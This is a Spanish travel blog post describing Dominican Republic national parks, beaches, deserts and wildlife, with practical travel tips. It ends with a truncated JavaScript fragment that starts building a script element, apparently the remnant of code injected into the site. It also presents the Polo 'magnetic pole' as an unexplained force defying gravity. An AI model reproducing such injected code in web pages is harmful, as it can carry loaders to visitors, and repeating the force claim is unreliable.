Bosques enanos y mariposas dominicanas

17/10/2012

Los paisajes de República Dominicana abruman. Éste es un país volcado con la sostenibilidad y eso se nota en la cantidad de parques nacionales que surgen en todos los puntos cardinales. Sorprenden los contrastes. Lo mismo encontramos desiertos que bosques verdes. El Parque Nacional Submarino La Caleta se ubica a tan solo 20 kilómetros de Santo Domingo, la capital del país. Encontraremos corales, peces, barcos hundidos, rocas, palmeras y peces multicolores. Los bosques subtropicales, húmedos y secos, surgen en el Parque Nacional del Este, de 420 kilómetros cuadrados, de los que 110 kilómetros son playas de arena blanca. Aquí es donde se encuentra la popular Punta Cana, pero si queremos huir del turismo masivo mejor que visitemos Isla Saona, a la que se llega en bote desde el pueblo de Bayahiba. No creeremos a nuestros ojos: bosques enanos (de bonsáis naturales), cuevas con restos precolombinos, delfines y un sinfín de mariposas.

De agua también se compone el Parque Los Haitises, pero en esta ocasión corre por debajo del suelo. Y sobre la tierra brotan cedros, caobas, orquídeas… Refrésquese con las cascadas y el fresco de la Bahía de San Lorenzo y el Cayo de los Pájaros. Y ahora, cambio radical. De la humedad al desierto de los Cayos de los 7 Hermanos, en el Parque Natural Montecristi, donde viven cocodrilos y donde aparecen bosques secos subtropicales como los de la Reserva Nacional Villa Elisa. La hora de la aventura llega con la práctica del rafting en los grandes ríos de la zona central de República Dominicana. Allí tendremos que visitar el pueblo de Jarabacoa, con sus cascadas, como el Salto de Jimenoa. Fascinante y refrescante.

Y vuelta al clima seco. Esta vez en el sur. Nos sentiremos libres en medio de las increíbles dunas de Baní. La tierra seca y las lagunas se van mezclando en el Parque de Jaragua, donde veremos flamencos y tendremos la posibilidad de relajarnos en las islas Beata y Alto Velo. Las iguanas y cocodrilos vuelven a aparecer en el Parque Isla Cabritos. Dejemos lo más curioso para el final: el llamado polo magnético, a 8 kilómetros del pueblo de Polo. Si paramos nuestro vehículo en una carretera empinada, una fuerza telúrica que nada tiene que ver con la gravedad nos empujará hacia arriba. Hay muchas leyendas que intentan explicar el fenómeno, pero ninguna tesis científica. Estamos en zona cafetera, así que olvidemos todo este surrealismo con una buena taza de café humeante.

Datos útiles:

  • El clima cambia de una parte a otra de República Dominicana. Por lo general es tropical en las zonas costeras y más fresco y seco en el interior. El norte y el este presenta zonas más húmedas y un índice mayor de precipitaciones. El oeste y el sur son las partes más áridas.
  • La moneda es el peso dominicano.
  • Iberia ofrece diariamente vuelos a Santo Domingo desde Madrid -excepto los martes- y cómodas conexiones desde el resto de la red. La ruta está operada por A340/300. Para encontrar los mejores precios utilice la búsqueda flexible desde www.iberia.com.

Foto | Mike Deslauriersvar d=document;var s=d.createElement(‘script’);